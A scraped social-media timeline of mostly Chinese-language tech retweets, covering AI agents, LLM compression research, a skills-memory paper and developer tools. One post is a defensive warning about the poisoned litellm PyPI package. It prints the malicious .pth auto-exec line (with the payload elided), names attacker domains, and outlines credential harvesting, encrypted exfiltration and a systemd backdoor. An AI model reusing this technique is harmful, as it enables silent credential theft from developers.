leeight รีทวีตแล้ว
leeight
13K posts

leeight รีทวีตแล้ว
leeight รีทวีตแล้ว

在 2026 年,人们都应该知道,AI Agent 就是新时代的 CRUD。你说它有技术含量吧,它确实没有;你说它没技术含量吧,但你要真正地把它变成一个生产环境可用的东西,需要考虑的细节有很多。
所以它就是 CRUD。我们以前 Web 2.0 所有的 App 都是 CRUD,但也不一定所有人都能写出替代那些 App 的产品。
面包🍞@himself65
任何有点编程能力的人应该知道manus本身其实一点技术壁垒都没有(从OpenClaw也可以看出),核心只有用户和产品体验,技术上你可以花一天搭个差不多的。 从这点上我觉得扎克伯格一点品味都没有,应该学OpenAI一样只挖人不收购。
中文
leeight รีทวีตแล้ว

🤯 @Vuejs -> @Lynxjs_org -> the Web
Mind-blowing how all these demos just work.
The loop is closed.
English
leeight รีทวีตแล้ว
leeight รีทวีตแล้ว
leeight รีทวีตแล้ว

怎么发现自己是个普通人的?
Jeff Bezos 靠一道偏微分方程题。
他当年压根没想过做生意。
一心想当伟大的理论物理学家。
一路杀进普林斯顿。
科科拿 A+。
挤进最顶尖的荣誉物理班。
这个班淘汰率惊人。
从开学的一百人一路刷到只剩三十人。
他一直以为自己的智商所向披靡。
直到大三那年撞上一堵墙。
一道偏微分方程作业题。
他和同样擅长数学的室友死磕了三个小时。
白纸上毫无进展。
两人彻底认输。
跑去敲开普林斯顿最聪明同学 Yasantha 的房门。
Yasantha 盯着题目看了几秒。
吐出两个字:“余弦”。
Bezos 懵了。
Yasantha 拿过纸笔。
当面写满三页纸的代数推导。
所有复杂项完美抵消。
结果严丝合缝就是余弦。
Bezos 问他这是不是全凭脑内推演。
对方的回答直接击碎了他的幻想。
没有人能心算这个。
他只是三年前解过一道同类型的题。
大脑瞬间对这两道题完成了完美映射。
Bezos 在这一刻放弃了物理。
聪明人靠拼命刷题可以拿满一堆 A+。
但站在学科顶峰需要的是怪物般的直觉。
顶尖天赋的门槛是基因焊死的。
中文
leeight รีทวีตแล้ว
leeight รีทวีตแล้ว

太牛逼了,Google 发的压缩向量的方法能
- 提高 llm kv cache 至少6倍到8倍的速度
- 提高 vector search 效率
Google Research@GoogleResearch
Introducing TurboQuant: Our new compression algorithm that reduces LLM key-value cache memory by at least 6x and delivers up to 8x speedup, all with zero accuracy loss, redefining AI efficiency. Read the blog to learn how it achieves these results: goo.gle/4bsq2qI
中文
leeight รีทวีตแล้ว

@chenchengpro 这里vibing coding热潮, 导致攻击者可以利用AI设计更隐蔽的攻击方式, 而防守方普遍水平被拉低了, 而且由于软件和模块快速涌现, 审核节点的能力跟不上, 可以预见未来一段时间,安全事故会快速增加
中文
leeight รีทวีตแล้ว

今天发生了一件让所有 AI 开发者后背发凉的事。
litellm,那个统一调用各家大模型 API 的 Python 库,GitHub 4 万星,月下载 9500 万次——被投毒了。
一行 pip install,你的 SSH 密钥、AWS/GCP/Azure 凭证、K8s Secrets、数据库密码、加密货币钱包、所有 .env 里的 API Key,全部被 AES-256 加密打包,POST 到攻击者的仿冒域名 models.litellm.cloud。如果检测到 K8s 环境,还会在每个节点部署特权 Pod 横向扩散。
最恐怖的是触发方式。攻击者在包里塞了一个 34KB 的 litellm_init.pth 文件。Python 的 .pth 是路径配置文件,由 site 模块在解释器启动时自动处理——如果某行以 import 开头,直接执行。攻击者利用这个机制写了一行:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
不需要你 import litellm,不需要你调用任何函数。你跑 pip、跑 python -c、IDE 启动语言服务器,甚至 pytest 跑测试——只要 Python 解释器启动,恶意代码就执行。装上就中招,完全静默。
载荷是三层 base64 嵌套:第一层 .pth 启动子进程;第二层是编排器,内嵌攻击者的 4096 位 RSA 公钥;第三层是凭证收割器,系统性搜刮 /home、/opt、/srv、/var/www、/app、/data、/tmp 下所有敏感文件。收集完毕后用 openssl 生成随机 32 字节 AES 会话密钥加密数据,再用 RSA-OAEP 加密会话密钥,打包为 tpcp.tar.gz 外传。
收割器之外还有持久化后门:在 ~/.config/sysmon/sysmon.py 注册为 systemd 用户服务,每 50 分钟轮询 checkmarx.zone 获取新指令,下载到 /tmp/pglog 执行。启动有 5 分钟延迟来躲避沙箱分析。即使你卸载了 litellm,后门仍然存活。
而且 pip install --require-hashes 也拦不住——恶意文件正常列入 wheel 的 RECORD,哈希完全匹配,因为包本身就是用被盗的合法 PyPI 令牌发布的。
你可能从没手动装过 litellm,但 DSPy、MLflow、Open Interpreter 等 2000 多个包都把它当依赖。Mandiant 确认已有 1000+ SaaS 环境感染,预计扩展到 10,000。
而这次攻击差点完美得逞——唯一的破绽是攻击者自己代码有 bug。.pth 通过 subprocess.Popen 启动子进程,子进程初始化时 site 模块又扫描到同一个 .pth,再次触发,指数级递归形成 fork bomb,撑爆了一个 Cursor 用户的内存才被发现。Karpathy 说:如果攻击者代码写得再好一点,这件事可能几周都不会被发现。
更荒诞的是攻击链的起点:安全扫描工具 Trivy 在 3/19 先被攻陷,攻击组织 TeamPCP 用它窃取了 litellm 的 PyPI 发布令牌,3/24 直接往 PyPI 推送带毒版本。用来保护你的工具,变成了攻击你的入口。社区在 GitHub 提 issue 报告后,攻击者 102 秒内用 73 个被盗账号发了 88 条垃圾评论淹没讨论,然后用被盗的维护者账号关闭了 issue。
自查脚本(覆盖版本检查、.pth 搜索、后门检测、可疑连接、K8s 扫描): gist.github.com/sorrycc/30a765…
安全版本:litellm==1.82.6。装了 1.82.7 或 1.82.8 的,假设所有凭证已泄露,立即轮换。

中文
leeight รีทวีตแล้ว
leeight รีทวีตแล้ว
leeight รีทวีตแล้ว
leeight รีทวีตแล้ว

我们上周的论文, Memory Sparse Attention,很多推友在评论区追问技术细节。
我们的技术生态 @troyhua 写了一篇完整的架构拆解,用了remotion + claude code 通过小视频把五个核心设计讲透了:
1)怎么把 1 亿 token 的 KV cache 压到能跑的大小
2)GPU 放路由键,CPU 放内容,分层存储怎么做的
3)稀疏路由怎么从 1 亿 token 里毫秒级找到相关文档
4)检索和生成在一个 pass 里完成,端到端可微
5)Document-wise RoPE:训练 64K,推理 1 亿,位置编码不爆
想看硬核技术细节的推友,这篇是目前最完整的一篇。
Troy Hua@troyhua
中文
leeight รีทวีตแล้ว

API keys were never meant to live everywhere…but here we are 🔑
AI tools > agents > pipelines > containers
And suddenly they do.
There’s a better way!
The Aperture alpha is now available via self-serve.
Learn more.
tailscale.com/blog/aperture-…

English
leeight รีทวีตแล้ว

CLAUDE_CODE_NEW_INIT=1 claude
可以体验新版本 /init
现在中间会有更多互动和选项,不止是帮你生成 CLAUDE MD,还可以帮你的项目量身定制添加 hooks,skills
Thariq@trq212
we're testing a new version of /init based on your feedback- it should interview you and help setup skills, hooks, etc. you can enable it with this env_var flag: CLAUDE_CODE_NEW_INIT=1 claude would love your feedback!
中文
leeight รีทวีตแล้ว

大多数人以为让 AI 变聪明,靠的是更大的模型、更多的训练数据。
但刚出的一篇论文 Memento-Skills 给了一个完全不同的答案——
不更新一个参数,照样让 AI 越用越强。
核心思路其实很清晰:LLM 的权重是冻结的,但它的"记忆"不用是静态的。
把所有的经验,都沉淀成外部的「技能库」——一个个结构化的 Markdown 技能文件,存着怎么做、怎么用工具、踩过什么坑。每次执行任务,先从库里检索相关技能;执行完,根据成败反过来重写技能文件。
这就是论文里的 Read-Write 循环:读技能 → 执行 → 反思 → 写回库。
失败了?系统会做失败归因,定位是哪个技能出了问题,然后针对性地改写那个文件——改代码、改提示词、改处理流程,改完还要跑自动单元测试才算数。
失败率太高的技能直接淘汰重建。
没有梯度下降,没有 fine-tuning,靠的是一套自动的"经验提炼 + 技能进化"流程。
结果呢?
在 GAIA 基准上:66.0% vs 基线 52.3%,差了整整 13.7 个百分点。
在难度更高的 HLE(跨 8 个学科的极限考题)上:38.7% vs 17.9%,性能直接翻倍。
技能库从 41 个技能,学到最后长到了 235 个,而且 t-SNE 可视化显示各技能按学科自然聚类——它真的在「分门别类地积累知识」。
论文还给出了收敛性证明,把性能提升拆解成三个独立变量:LLM 质量、检索准确率、记忆覆盖密度。三者相互独立,意味着你可以各自优化,互不影响。
更关键的一个洞察是:收益递减不是 bug,是收敛信号——技能库越密,需要 LLM 现场泛化的部分就越少,系统越稳定。
我们对 AI 进化路径的默认想象,一直是「更大的模型、更多的算力」。
但 Memento-Skills 提示了另一条路:让经验变成可复用的结构化记忆,让智能体在部署之后还能持续进化——这可能才是真正的持续学习。
论文开源,技能库也公开,感兴趣的可以去翻:arxiv.org/abs/2603.18743
中文
leeight รีทวีตแล้ว
leeight รีทวีตแล้ว

我根据 DDIA 的思想设计了一个 SKILL,帮助大家设计可靠、可扩展、可维护的高性能后端分布式系统:
github.com/luoling8192/ai…
中文









